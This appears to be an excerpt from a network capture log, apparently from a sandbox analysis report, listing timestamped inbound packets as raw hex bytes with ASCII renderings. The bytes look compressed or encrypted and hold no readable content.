                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC937INData Raw: 44 18 6a cc b6 f5 ce 58 cb 9e 1c 62 8c 79 4e e5 92 a9 84 25 a6 64 7d 45 ab 35 b2 17 a9 3c 2b f7 b4 ef 9b 5a 8d 56 ad 6a 44 1f 3c 4c b0 5f 70 77 2b 24 24 29 f9 db 66 0a 23 d2 75 3b ee 1d 83 34 af ad 5d 97 4e 5b c4 29 32 19 5a 19 27 c7 8d 2c b0 1b e5 b8 3b a1 1e e8 db 43 9c 28 12 e9 8f 94 9e be b1 ce ec 7d 6b 9e 0e 08 0a 6d 48 76 35 f3 ac d3 99 dc 75 1c 44 2e 45 79 72 1a 2d 06 b5 32 1b d1 35 c1 96 32 78 32 69 75 bc e3 78 f5 9d 75 26 4e ba 1e 4c 62 e4 28 a2 fd c5 82 31 4f 15 e3 55 c5 6d 08 bd a7 f2 44 ba e3 32 32 28 17 53 0a ed 7f 7b c6 dc c7 36 a7 6b 52 2c 06 75 26 b3 e0 f1 37 9a 59 56 f6 22 67 3b 72 91 d4 8d dd ad a9 15 c7 f3 d0 c4 9b 6f 56 14 3e 27 1f 7b e3 cb 83 77 06 de c9 7f 06 8d 41 d0 6a 10 67 a2 75 ce 84 50 1f 7c d8 97 4e 77 b5 7a 46 0d 4f 75 67 aa
                                                                                                                                                                                                                                                                                                              Data Ascii: DjXbyN%d}E5<+ZVjD<L_pw+$$)f#u;4]N[)2Z',;C(}kmHv5uD.Eyr-252x2iuxu&NLb(1OUmD22(S{6kR,u&7YV"g;roV>'{wAjguP|NwzFOug
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC939INData Raw: 12 12 4d eb 04 87 1f d9 6d 71 2d 35 28 83 e7 2b b1 04 52 dc ec b4 04 6f d4 b1 f8 8c b7 46 8f 0d 17 76 b0 f0 4d 0f 84 f8 c8 1f 67 d5 c6 44 6c 4b 2e 28 09 98 c0 77 da a0 91 ab 9b 30 4e 8e 8e c2 6b 7d 3f 08 c7 2f 6b 38 d2 cc 44 8a 5a 24 a6 bc 4c cc 1a 21 5d 11 42 4a a8 fa 61 f0 68 8a a0 fa 12 1d 98 7e 7e f6 9b dc 69 52 13 28 9b cc e7 3c 9a 45 83 a6 6e 0b d4 0a 84 76 eb 6d 3c 1c 86 50 7a cb 2f f5 62 7e 4e 86 3c 61 39 c0 5c 76 aa 80 3c 64 93 3e d8 67 02 73 37 f0 c0 86 e3 33 28 a4 0c 7f ce ad 6f 7d 7b b8 ec ad dd 69 7f 71 bf c9 b7 53 42 1e 17 77 8d c1 6e 71 3a 70 c3 b7 ba fc b4 f7 d5 23 12 d4 03 ac 4f 04 d3 fc 8d b7 e5 25 78 11 f2 94 38 ea 23 b3 13 be 8c de 5d 6b 96 6a 53 d4 f4 93 d0 14 d0 19 eb b8 2c 87 2a 04 4a 10 5f 78 bd eb bf 05 1c e9 f8 43 d9 ea af c6 23
                                                                                                                                                                                                                                                                                                              Data Ascii: Mmq-5(+RoFvMgDlK.(w0Nk}?/k8DZ$L!]BJah~~iR(<Envm<Pz/b~N<a9\v<d>gs73(o}{iqSBwnq:p#O%x8#]kjS,*J_xC#
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC940INData Raw: 64 d9 17 00 f7 74 b6 fa 53 09 fb db 12 f0 46 d0 fe c6 5b eb a9 c2 9d 41 ab 1c 7c de 7f 33 ba d7 4c 0e 9c 51 f5 60 ca 00 ce 66 41 1b 16 27 7c 4c 29 b8 0a cf a2 44 8e 27 aa fd 56 54 28 ef d9 bb 0a 6b 67 a9 22 90 b6 f7 9c a2 17 d8 8b 15 9a 85 2b 39 06 dd b7 bf 19 b6 d4 21 80 7a 52 0e 50 e7 42 bb 6d 6d eb 0f b0 d5 1f d1 4d d2 16 71 19 4d 20 a4 4b 6a 93 8d 5a 1c 5c 24 68 6f 4d db cd ea 55 aa d6 44 9d 7d 46 d2 f8 1d 9a 35 91 de dd 83 bf af 9c 85 d5 b8 01 2d 92 5a bf 87 34 cd c0 3e 65 9e 2f 01 5a 66 15 4c 66 2a 54 35 47 19 d0 70 91 a6 15 9b 82 43 6d c1 ba 05 5c 5a 02 8e b2 3b 2d c1 a7 66 40 fb 6d 9e b9 36 6c a3 88 40 4e 4f 63 9f f6 bb e6 ac c5 81 43 73 09 90 52 6a 9b 3c 6f 5b 2d ac fe c4 56 3f 81 72 42 56 57 a6 ed 4e e8 0a 15 51 d4 8c fe ba 0c 61 bf 8a 56 84 96
                                                                                                                                                                                                                                                                                                              Data Ascii: dtSF[A|3LQ`fA'|L)D'VT(kg"+9!zRPBmmMqM KjZ\$hoMUD}F5-Z4>e/ZfLf*T5GpCm\Z;-f@m6l@NOcCsRj<o[-V?rBVWNQaV
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC941INData Raw: b7 26 1a 60 0b c5 28 4f 20 9b 5d 84 ed 82 66 f7 0b 21 e1 a0 f8 d3 1f 96 0d c5 11 ff 8f 92 e4 5a f9 40 6e 70 1d 27 b7 ba 85 97 3b 3c 83 e3 2b fe 26 e4 1b de e0 f3 5d ef 09 fb a1 8f 40 7e ec 13 b3 42 98 d1 89 eb 1a 2f cc 2c 9f ec 19 3f cc 0d 01 02 73 82 f2 97 42 b8 6e 8a 60 b9 25 66 c1 bf 38 ae 15 49 2c 66 dd 30 16 16 bb 38 56 1b 78 36 fd ec ec d6 71 70 d8 22 71 1a e0 e6 b6 55 e3 b5 51 e7 33 c0 cf 6f 9b 29 c0 20 28 48 2f 24 c4 20 2c 4c 2f 22 a2 1f 0c a6 17 15 35 20 26 66 83 2f a9 1f 06 73 f8 04 37 8c 40 d8 77 41 da 72 95 b6 eb 8e b2 e1 41 b0 46 46 46 bf ac ac 61 22 51 3f 89 64 1d 59 47 5d ed 9d 30 84 b2 21 83 70 76 cc 01 9b 17 87 88 90 c0 6d c5 28 7e 7b 24 b1 db 2b 83 df 01 79 ec 6e 50 c4 ef 88 71 a8 64 75 dc 4e 6b 61 f7 2c d3 d8 3d d7 06 b0 97 d8 44 ab 65
                                                                                                                                                                                                                                                                                                              Data Ascii: &`(O ]f!Z@np';<+&]@~B/,?sBn`%f8I,f08Vx6qp"qUQ3o) (H/$ ,L/"5 &f/s7@wArAFFFa"Q?dYG]0!pvm(~{$+ynPqduNka,=De
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC943INData Raw: 64 4c 40 31 59 38 61 51 96 45 f1 56 22 a5 f2 71 de e2 35 b8 c4 a3 aa 66 f5 76 6a 31 f5 da 10 6b 7c 6c 2a 68 49 6b da 60 d7 3e ed e8 d4 d9 ba 8b c2 4f 45 2b 06 8b c3 27 14 87 41 50 0c 27 48 8a 66 58 8e 17 c4 f2 6e 72 e0 f2 f8 05 f5 0b 11 89 25 52 99 5c a1 54 a9 35 5a 5d bd 75 03 46 53 33 16 37 88 e4 0a 18 51 aa d4 a8 a6 16 0c d7 f9 26 f4 a4 c1 d8 d4 44 2f 08 41 58 92 09 65 5c 28 aa 56 ef 74 9f f8 f9 77 67 a1 a7 dc 42 49 a5 59 95 a1 5c c5 a9 0e 9b 7a 0d 1a fb bb 45 1f b2 0d c5 5e fe 1c ed b9 cf 1d b1 cb ff c3 15 19 4b 45 99 72 f4 55 91 1e 19 a8 c4 54 55 2d b1 51 87 b3 90 16 ef e0 7c b5 01 7f 11 bf fd 9d cd c4 b3 07 50 b3 bc 50 30 a7 d7 9d 7f c5 ad aa e7 99 f7 23 f3 f4 fd f2 9f f3 60 81 f2 88 91 29 d4 b4 8f ff ff 93 18 65 f9 9f e8 a2 9f d1 80 d3 10 00 43 fc
                                                                                                                                                                                                                                                                                                              Data Ascii: dL@1Y8aQEV"q5fvj1k|l*hIk`>OE+'AP'HfXnr%R\T5Z]uFS37Q&D/AXe\(VtwgBIY\zE^KErUTU-Q|PP0#`)eC
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC944INData Raw: 53 4b cf 65 79 8e f5 c3 6b 6d b6 cb f8 97 ac 58 1f 71 7d a6 ef 54 59 ca 49 48 80 16 39 e0 53 09 c5 10 a0 2a 28 4d 42 ad da 57 fd 14 9a b9 0f 82 fd 80 a1 f5 4c 4e 48 ac 48 4b 55 a0 d1 f7 cd d7 1e 74 22 11 52 ab 74 84 d1 0a 56 6c 63 b5 55 89 a8 12 aa 95 54 9d 1a 14 55 bb 46 c3 aa 4d d3 9d ee 6f 91 57 5f 85 0d ae 9a 62 e2 74 f7 e3 b0 6f 8f ba 1a 4e 99 aa 26 a6 54 2a 66 b8 7c 9b f0 7f eb 2e 3a aa fc 56 2c ba f2 bd 1e 80 21 ff a4 1f 3f f8 fc 59 10 02 01 08 c3 1f 53 20 12 3a ff f4 e0 2a 3e 11 86 58 d0 a7 4b a4 9f 30 43 2a 57 1e f9 93 b6 18 71 90 82 a9 f1 87 99 45 9f 7c 1f 16 c8 19 c3 d1 38 d4 bd 9b 88 dd 02 1a a8 c3 84 0f 01 e8 45 a9 cb 78 33 78 77 42 42 8e 37 24 54 94 07 dc 6f 40 02 cd 02 7e a5 d5 9c 71 cd 4d 9d 2f bd 5f f8 9e be 63 00 40 a8 85 c6 44 18 30 f6
                                                                                                                                                                                                                                                                                                              Data Ascii: SKeykmXq}TYIH9S*(MBWLNHHKUt"RtVlcUTUFMoW_btoN&T*f|.:V,!?YS :*>XK0C*WqE|8Ex3xwBB7$To@~qM/_c@D0
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC945INData Raw: a1 1d 86 41 50 ec ed 12 a6 76 29 a4 cc ec f6 a8 f2 1f b6 ad f6 dd cc b5 29 cf 35 bf c4 fa 62 60 f8 fb a3 b7 24 d7 f4 db 10 9c 0a c2 75 96 ab 08 55 56 b9 ba c6 6a cb 8f 8e 7a 68 a3 6d a9 ef dc 60 46 93 d9 12 20 18 17 12 18 41 31 9c 20 29 9a 61 39 5e 10 25 f9 7c c5 84 05 23 f3 51 04 f3 5e e0 f5 63 09 8a e1 04 29 a0 68 86 e5 84 97 19 3a ce ff 61 a1 54 a9 f5 86 35 b2 34 13 a1 a5 14 8d c1 e2 e2 21 10 49 64 0a 95 46 5f 86 7e 07 07 01 23 2c 36 87 cb e3 0b 84 22 b1 44 2a 93 2b 94 2a b5 e6 b2 85 78 b0 d3 1b d6 28 be 99 30 5b ac 6d 6d ed 38 9c ae 4b a7 ca 35 ee ea 43 41 09 a6 a2 a6 59 6e a1 8f 9e 9d 3f 7b 1b 03 a0 8e 3a fb 5f f8 14 bc 2b 89 80 c1 75 a1 41 3c a9 b1 08 c1 1d f1 7d 42 0c 98 84 64 20 b4 36 a5 65 ad a1 31 5f 56 b9 5d 4c 3f 10 3c 60 50 0b 27 00 5b fa 7a
                                                                                                                                                                                                                                                                                                              Data Ascii: APv))5b`$uUVjzhm`F A1 )a9^%|#Q^c)h:aT54!IdF_~#,6"D*+*x(0[mm8K5CAYn?{:_+uA<}Bd 6e1_V]L?<`P'[z
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC947INData Raw: 01 be 08 84 22 b1 44 2a 93 2b 94 2a b5 a6 36 ba 0e bd 61 37 ae 76 43 bd c2 6c b1 b6 a9 dd e1 74 a5 7c 77 73 9e 39 16 c2 de 3d c9 d7 18 d6 70 24 9f 8a 46 ce c2 df 37 87 e5 43 00 55 83 b9 e8 ce 62 3a 86 f5 c5 6c fc b6 2f 64 2d 4f 11 41 2e 92 5a ed 23 e4 e8 d3 37 37 f1 7b ea 1f 37 d1 a0 c1 42 34 b8 65 ed 83 69 e8 9f 12 71 b7 9a 12 88 60 70 0c 3e 6f 36 58 70 61 0e 16 58 ba 0b e4 26 b2 28 a2 b6 9a c9 af 9b 10 02 30 2e 3c 84 75 c1 a6 36 c8 f1 0a 36 f4 7c 03 66 ad 7b e7 89 cb ab 15 f5 a1 21 d4 1c 24 61 45 50 0c 27 48 8a 66 58 8e 17 c4 72 e7 0a aa a6 1b a6 65 a3 0c 10 61 49 26 94 71 a1 a8 5a 77 d6 1e 20 21 5c 41 04 14 c3 09 92 a2 19 96 e3 05 b1 b4 87 32 8a 5a db 49 1d c3 b4 da bb ea e0 7a b9 7a 98 6d 07 31 ce 8a 0a 30 54 62 aa 0a 99 e9 b3 b3 c0 1a e7 da 11 25 e7
                                                                                                                                                                                                                                                                                                              Data Ascii: "D*+*6a7vClt|ws9=p$F7CUb:l/d-OA.Z#77{7B4eiq`p>o6XpaX&(0.<u66|f{!$aEP'HfXreaI&qZw !\A2ZIzzm10Tb%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC948INData Raw: 4c 28 e3 42 51 35 bd b1 ca 26 96 ed 74 57 d3 43 62 7c fe a2 0b 00 c0 d0 d2 c3 20 28 86 fe 91 25 91 2d a4 d3 7f 99 ee b2 06 8e d8 9c 49 47 90 e8 ff 0c 1c 45 4e c9 69 9e 29 f3 bc 5f f4 02 d6 e7 2a ba 08 d1 5f 38 e0 11 ec cf b5 14 02 ce a5 27 10 ae ff 2d 60 02 e0 7e 54 1d 01 76 e7 59 9a cc 92 9e ee 86 7b ae 5b d4 49 b7 6b 7f d3 85 c5 d9 72 50 fe 69 ae a2 3b da bf ec ed 6e 6c cc a5 f4 31 f0 28 27 2c 64 e7 fa 71 1b c4 68 32 5b da d1 81 c0 d0 c1 ce 21 81 11 14 c3 09 92 a2 19 96 e3 05 51 92 cf 57 85 e8 c4 c9 7c 14 c1 bc df 05 7f fa 8f 04 14 c3 09 52 40 d1 0c cb 09 9f 33 74 d7 3e 36 27 3c 16 5e 29 2a 75 4d a1 16 5d 3d 06 3b 7b 87 4e 38 bb 44 08 d5 27 1a 0c 16 87 27 10 49 64 0a 95 46 5f 06 c3 03 4c 71 73 5f 90 b7 01 48 61 84 b5 6c 29 8c 03 77 79 32 1a e0 23 10 8a
                                                                                                                                                                                                                                                                                                              Data Ascii: L(BQ5&tWCb| (%-IGENi)_*_8'-`~TvY{[IkrPi;nl1(',dqh2[!QW|R@3t>6'<^)*uM]=;{N8D''IdF_Lqs_Hal)wy2#
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC949INData Raw: 8c 42 ac 45 3e de c6 ab c8 c3 02 6c 3e df be 4d 5d 2a ee 88 ff 7d 0f b1 2f e4 26 bc ea 3d 1b e5 5a 6b 87 23 de 6f cd ac 04 61 d5 45 16 73 10 94 7c cf 85 d0 de 43 b8 48 4e fa e8 3a c2 ed 5f 81 38 98 ab a6 df 81 ef ff 8b cb 39 5e ad e5 0d e1 ed 64 3b 12 03 40 77 b0 ce f7 76 7f d0 8f 52 84 99 01 0d 56 85 0c 46 50 0c 27 48 8a 66 58 8e 17 44 69 9f 0f 6e f9 86 ed 34 86 ce c9 60 1a ce 2f cb c8 6e 00 04 82 11 d6 b2 69 8c 03 f7 e4 09 7c 81 50 24 96 48 65 72 85 52 a5 d6 ac b6 d0 03 3a f4 86 35 96 7e 26 cc 16 6b 5b 5b 3b 0e a7 2b 77 d5 d1 5c 17 1f 8b 45 07 b1 a0 04 be b7 72 a8 7d 92 54 40 09 a6 a2 a6 c1 31 ac 05 ef 93 a8 09 69 9f 4c 58 6e 1c cf 71 22 0e 4e 34 5d ab bc f5 83 28 d5 75 42 d4 8b 90 4c 20 a1 f4 a9 90 7d 94 d0 84 f9 07 85 dc 0f 2c 0f 8b 84 54 f6 d2 09 bf
                                                                                                                                                                                                                                                                                                              Data Ascii: BE>l>M]*}/&=Zk#oaEs|CHN:_89^d;@wvRVFP'HfXDin4`/ni|P$HerR:5~&k[[;+w\Er}T@1iLXnq"N4](uBL },T
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC951INData Raw: c7 d2 af 5f 33 d2 36 c4 8d dd 4e 01 67 7b e4 db 64 0a 91 16 7b 45 44 14 df 15 ab cd 82 6d 15 05 5c b5 16 0a a0 aa 2f 97 6c e3 aa 30 51 0a 2c 2a 51 8b e6 c6 bd b7 7d 83 91 f6 60 e8 a1 75 e8 b6 89 a6 0a e0 b6 c9 e0 6e a5 69 e2 9b 24 0d 60 ab 5a 0b ba ad 5a 69 f4 27 a3 aa 0a 75 08 9d 68 4d b6 33 c2 73 20 e8 15 2e 0d d7 2c e7 b8 37 eb 09 6b bc 51 87 a8 16 21 21 50 21 7b 55 a1 40 69 0d bb 6d a2 8e ad 5a 90 d0 10 49 05 ab 4f 21 d9 c6 2c 93 14 99 61 de 03 8f 04 0c 90 cb 7d 86 02 9e 42 ab 78 a6 af 72 54 36 8f e8 a1 62 20 36 69 f4 83 48 a9 9d 93 b7 f8 c7 1a e0 2b e6 85 71 64 8a 23 5a ac b3 c5 56 9e d4 72 8e 2a cf ff 77 fc f5 e2 99 10 32 9e 73 41 0b df 36 03 d0 26 bb f8 8a b7 92 19 2d e3 12 43 df 24 cb a6 b5 78 6b 13 3e db 82 6f 2a cc 4a 6e bd f0 7a 6f 13 45 bf 4a
                                                                                                                                                                                                                                                                                                              Data Ascii: _36Ng{d{EDm\/l0Q,*Q}`uni$`ZZi'uhM3s .,7kQ!!P!{U@imZIO!,a}BxrT6b 6iH+qd#ZVr*w2sA6&-C$xk>o*JnzoEJ
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC952INData Raw: e7 d4 cb b5 da 9a e5 86 56 35 c1 80 3a a3 d9 bb 31 60 f2 45 10 56 c6 52 af c0 b7 27 70 8c 74 69 cc 1a 5b b1 58 5d bb b9 b2 23 60 2b ab 83 02 78 23 de 39 50 00 b2 31 ea 7b cd c9 26 c7 52 ad 5f 4e 18 48 c8 ea 19 2d a1 68 fe 25 0e af c4 a1 23 f9 76 2e bf 82 35 34 0a 60 c1 a5 5b 21 06 d1 1a 65 44 a1 ca e3 35 5d f5 02 5d a4 b6 71 7e d6 eb 72 31 7e d3 75 19 97 b6 da c8 6d 55 2d d5 1f 60 de ca ac 35 3e 4f 68 5e bd f4 21 94 5e 48 3c ff 36 00 2e 1e 86 e2 82 72 58 10 14 c3 09 92 a2 19 96 e3 05 b1 34 90 5c 41 d5 74 c3 b4 ec ce 22 ba 04 00 c0 08 2c c9 84 32 2e 14 55 ab af c0 ed 21 7d 7c fe 72 0b 00 c0 d0 a2 c3 20 28 56 b8 81 22 c4 12 f4 ae d4 aa a9 cc ab 19 3b 25 d1 af b6 19 20 77 cc b7 72 dd 6f bb cb fd 16 96 12 8e 54 c6 a3 89 1e 2d ab 23 a8 da 88 a5 38 6b 0a 57 59
                                                                                                                                                                                                                                                                                                              Data Ascii: V5:1`EVR'pti[X]#`+x#9P1{&R_NH-h%#v.54`[!eD5]]q~r1~umU-`5>Oh^!^H<6.rX4\At",2.U!}|r (V";% wroT-#8kWY
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC953INData Raw: b2 3f a2 b1 b6 31 21 15 cd b9 62 b1 ba c4 71 3b 36 67 6a bb 6b 7b 0a f6 84 f3 15 08 2c 52 de b0 75 5d 09 21 21 67 71 fb 6f 87 7a 08 68 d8 33 90 87 3c ed 26 cb 46 c3 1e 42 e3 c1 f6 9a c6 3e 6e 13 56 22 40 c4 d4 ab a5 22 a2 86 80 cd ee 5c 2a 3b 5c 51 84 18 71 de 35 44 ed 49 7f 80 ab 97 6a e9 09 a5 d7 e6 01 6b 00 8a 44 6d c6 06 49 58 11 14 c3 09 92 a2 19 96 e3 05 b1 d4 5f ae a0 6a ba 61 5a 76 67 ee 2e 81 02 30 02 4b 32 a1 8c 0b 45 d5 ea 2b 68 2c b1 29 96 ed 74 17 d4 03 05 38 a5 1f 59 51 35 dd 30 2d e8 f9 57 31 9d 3e 47 34 d4 63 58 d0 02 70 75 d0 ea 5d 9b d2 6c f8 8d 6a 6b 2e 25 93 53 72 9a 67 ca 3c 57 cb f3 74 17 58 a6 a8 ff ba 85 9f 21 a2 ba e1 19 98 de 4b 5e 0d cf 1d f1 2b f2 56 7d 51 1d 41 05 0f ff 9a 3a 5b 58 59 e5 ea 2e e2 6a a8 ad ed aa cf e3 46 7a e8
                                                                                                                                                                                                                                                                                                              Data Ascii: ?1!bq;6gjk{,Ru]!!gqozh3<&FB>nV"@"\*;\Qq5DIjkDmIX_jaZvg.0K2E+h,)t8YQ50-W1>G4cXpu]ljk.%Srg<WtX!K^+V}QA:[XY.jFz
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC955INData Raw: e0 7a 9f e7 fb a5 df f2 d7 99 d9 08 4d 76 df fd fa ed af 6e 20 3a 99 df ae 26 28 5a e0 71 6b 69 6b 4b ff 85 00 51 b4 4a e6 e6 6c 8e 34 6c 1f 08 3a 8c a4 3a 1f df 9d 4c 17 bf 1d 77 01 8f 80 6a 21 74 12 4b 43 38 55 65 5b 95 ab bb 88 a8 a1 b6 b6 44 e7 6e 73 dd d9 a3 f3 b0 75 3f c4 76 83 aa 9f 61 db ad 7e 82 06 33 9a cc 96 76 cd ed c5 21 30 6e b0 7f c8 60 04 c5 70 82 a4 68 86 e5 78 41 94 e4 f3 d5 bd 3c 8c cc 7c 0c c1 bc 17 78 fd 49 82 62 38 41 0a 28 9a 61 39 e1 4a 09 7f 0a 67 68 55 7f bf 9c f6 58 78 a5 aa d4 35 85 5a 74 f5 18 d6 c8 c6 e0 49 5a c6 b5 c2 da c6 b6 5d 5b 7b 1c 9c 9c 5d 42 47 8d 15 0d 06 8b c3 13 88 24 32 85 4a a3 3f 8c 96 2e 33 ba 9b b8 2f c8 f3 20 60 84 b5 6c 01 8d 03 37 ef 99 3c 1f 81 50 24 96 48 65 72 85 52 a5 d6 ac b1 1a 66 26 cc 16 6b 5b b9
                                                                                                                                                                                                                                                                                                              Data Ascii: zMvn :&(ZqkikKQJl4l::Lwj!tKC8Ue[Dnsu?va~3v!0n`phxA<|xIb8A(a9JghUXx5ZtIZ][{]BG$2J?.3/ `l7<P$HerRf&k[
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC956INData Raw: 01 45 33 2c 27 bc cc 10 26 6f 56 28 55 6a bd 21 34 94 a2 31 58 1c 3e 01 22 89 4c a1 d2 e8 cb e0 e4 7a 1a 72 50 ff df 04 46 58 cb 63 6f 7c 04 42 91 58 22 95 c9 15 4a 95 5a 53 1b 5d 87 de f0 32 be fe 37 93 d9 62 6d c3 ee 70 ba b6 ee 9c a7 af e6 86 4f 3d 27 da da 80 6b 63 3c e8 f9 5b ee 21 03 25 79 9f 14 50 82 a9 a8 69 2e b5 12 8d 8c 0e 66 ff 80 92 c9 c6 90 58 7d 1f fa 17 ed e3 b5 5e 6b b0 71 d4 37 cb b5 7f ac d1 65 dc e8 0d a0 53 5f 01 eb 35 f5 a5 2b 82 9e c3 54 90 6a ae 17 62 82 c5 42 32 81 40 01 81 8a b5 18 b4 44 fe 7d b3 c9 67 11 13 55 1a 33 77 71 0c 9a 17 0e 05 f6 c9 5f 0c 9a 01 d2 a4 46 37 c4 cc 32 29 68 67 7d 99 a9 dd 5b 22 b5 b2 57 e0 d7 52 11 7f 0d 30 0f b2 d4 45 cc 28 61 05 ae b2 51 e0 6e 5c 7d 8e d3 7b e8 e7 87 03 dc 00 0c 81 cb c0 78 44 07 e3 09
                                                                                                                                                                                                                                                                                                              Data Ascii: E3,'&oV(Uj!41X>"LzrPFXco|BX"JZS]27bmpO='kc<[!%yPi.fX}^kq7eS_5+TjbB2@D}gU3wq_F72)hg}["WR0E(aQn\}{xD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC957INData Raw: 39 c9 4a 20 7e 73 a8 f8 b3 d9 eb 61 3c ad d9 ab a1 ba ed 1d 21 0c e3 77 d0 b8 17 e8 e2 75 53 8d 65 9e 52 60 8e c2 ee a2 22 f5 6a ad b2 82 7a 20 14 3f 18 dc 7e 64 2c da 4e be e4 db c6 1a 6f 59 42 23 cb da b7 4c c5 9e 3f 11 38 9f da 3e 06 63 cb 8f d1 ca ff 7c 94 c3 dc a5 d0 8d 02 26 2e 85 ef ed 60 e8 ff 61 ee 18 dd 2f bf 7d 0a 6d b7 22 32 db 68 bc 13 b7 73 88 da 07 4f 0e 77 51 f9 f0 fa 6e 1e 9f 1f 3e 1c 8e c6 b7 80 18 7c 01 b1 b8 13 71 b8 1e f1 f8 c4 a3 09 f8 c0 c3 93 fd 23 84 57 c8 7e 4d d6 c2 37 3d 0e 80 f8 df a6 22 3c 53 16 ae 29 09 c7 14 85 34 05 10 00 a3 e0 0a 00 cc 45 21 a3 68 d3 b3 d6 07 10 35 88 34 ba 85 01 fb 2f 48 44 72 c7 64 fc ce 78 91 6e 28 f9 dc 92 b7 84 17 5a e9 7f ef e6 c0 54 40 4b 20 08 07 46 16 cb 08 00 ad 00 60 a6 77 8c ad f8 90 83 69 1f
                                                                                                                                                                                                                                                                                                              Data Ascii: 9J ~sa<!wuSeR`"jz ?~d,NoYB#L?8>c|&.`a/}m"2hsOwQn>|q#W~M7="<S)4E!h54/HDrdxn(ZT@K F`wi
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC959INData Raw: 11 af cb f0 e1 75 75 1e 83 7d 6b 47 ef 82 05 92 bd eb 8c 9a 21 74 ee 9a 72 c8 21 ad 8c 2f 90 7d fe 75 ec b1 56 e1 f2 3a 20 73 e6 cc 74 ee 63 95 26 55 56 6e 39 e4 a4 eb fd 17 7e 99 91 dd 63 e3 56 93 a3 a9 0b 16 98 82 bf 49 75 f5 c1 07 3b 02 6b 64 c9 92 9a 1a 09 a8 7e 1e 77 dc 94 79 47 90 9d 7c 9b ba 1c 50 56 5c df 0e 07 41 57 fe 18 58 10 9b b4 53 4b 0b 43 1d fe f6 7a d7 a2 65 7f d3 47 71 4f b3 5f 98 62 45 e2 be 6f fd d1 94 e8 70 ac 5a 95 7b 09 c8 80 c2 6d df af 29 29 a5 a8 3d 1e be e9 3d a6 49 77 e3 a9 bb be ea c0 e9 66 9c 7b 6e 8e ee 20 68 f6 f8 02 8f dc c5 cb e0 fa 7f fd af e6 fe 05 2a 08 24 5e ed ce d5 00 1c 22 d0 21 68 ce d5 1b 3c a6 f1 ad a5 45 4b 0d fa a1 d7 be fd 8e 75 a3 e8 1b cc c2 81 a6 7f c6 6b 7d b9 55 c7 01 69 8e db b6 d5 ca df 71 bc 46 93 95
                                                                                                                                                                                                                                                                                                              Data Ascii: uu}kG!tr!/}uV: stc&UVn9~cVIu;kd~wyG|PV\AWXSKCzeGqO_bEopZ{m))==Iwf{n h*$^"!h<EKuk}UiqF
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC960INData Raw: eb 99 cc af 62 67 9a 79 2c 5f e8 a2 97 9f 95 d3 e5 6c b9 58 cb ea 3d 4a 3a aa 21 81 02 a2 94 52 8d 5a 34 4b 6e 0a 52 94 92 c4 53 99 78 48 e2 e7 5a 26 56 dc c5 63 3c cb f3 ac 65 1d 5b b9 8c eb 18 71 cc 09 a7 5c e5 36 f7 e4 32 71 a4 ac 93 4a 76 ca 41 e9 95 02 d9 22 45 b5 58 aa 4b 43 a5 11 aa 49 91 ea 53 46 95 a3 64 1d b7 fe 00 bd 89 6e a2 99 1e a4 67 e9 d5 59 fe 7e b3 c2 4b f5 35 d0 90 51 d3 e1 ec 1c 6f c1 42 24 7b b1 1f 72 f5 f6 db 2e 86 6c bb 96 91 db 02 5b 9d 99 78 f5 8a 47 48 4b e5 c4 9f 29 a2 88 aa d4 a4 2e f5 c9 47 61 8a 13 47 25 e2 41 19 a8 e6 7a be ae eb e4 61 9e 81 98 6e 5b ce 90 c9 eb ce b8 c9 dd 97 e9 91 f4 f8 e1 f1 d2 2b f6 d3 93 f4 3c 6d d6 61 65 7c 10 a0 f5 b3 b9 0b 60 95 43 79 75 00 34 2f ca 0c d0 fc 16 e4 a4 cd 23 15 18 b5 f5 01 cd 0f 2e de
                                                                                                                                                                                                                                                                                                              Data Ascii: bgy,_lX=J:!RZ4KnRSxHZ&Vc<e[q\62qJvA"EXKCISFdngY~K5QoB${r.l[xGHK).GaG%Azan[+<mae|`Cyu4/#.
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC961INData Raw: 96 64 56 58 c5 93 80 2a 03 d6 7a 02 b8 bd 34 dc 84 88 84 6b c1 89 ef 6a 19 c2 46 25 59 89 04 14 44 09 44 e5 f1 94 8f ee 1d 20 e8 bd 98 a7 2a 7d c3 5b 87 97 55 04 10 02 54 f4 0c d3 0a a9 e4 56 41 08 40 a8 53 b1 d3 a2 c9 c2 fa 1c 04 47 9e 70 47 29 07 05 5c f5 45 4a b9 f2 61 cc af 02 21 df 1c 05 14 f6 11 eb ca 0a e0 97 c4 b5 e8 df 16 4b 97 dd f3 4e b9 fa 20 d8 64 ce 25 be 14 ef 1d 64 b9 90 04 26 75 63 73 93 db dd de da 73 de fd c1 16 00 49 16 e0 9a 9f 9c cb ac eb a1 1f 59 54 d5 79 14 57 5d 07 2f 87 a6 d4 e4 46 19 50 5e 08 17 59 26 63 15 33 15 a3 95 9a 1c 0b 4b 40 6d 4e a5 c0 27 9b 21 dd fd 97 50 a6 3e 1e 55 6c d7 f5 dd e8 d9 58 28 88 e3 76 db 69 b8 3e f6 fc ad df 7b eb 75 5c 3b a3 ae 02 68 6f c8 56 50 40 ee 03 c0 09 b8 16 00 5d b4 84 15 80 01 08 84 83 5d 4b
                                                                                                                                                                                                                                                                                                              Data Ascii: dVX*z4kjF%YDD *}[UTVA@SGpG)\EJa!KN d%d&ucssIYTyW]/FP^Y&c3K@mN'!P>UlX(vi>{u\;hoVP@]]K
